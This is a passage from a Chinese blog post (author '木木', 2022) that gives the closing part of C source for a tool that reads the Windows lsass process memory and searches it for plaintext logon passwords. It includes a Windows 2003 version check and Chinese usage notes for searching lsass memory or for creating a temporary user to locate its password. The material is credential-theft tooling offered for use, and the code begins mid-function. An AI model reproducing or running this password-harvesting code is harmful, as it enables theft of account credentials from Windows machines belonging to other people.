- 作者:木木
- 时间:2022-12-24
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess);
Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
}
}
else
{
printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File
附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
用法:
1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置
2.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。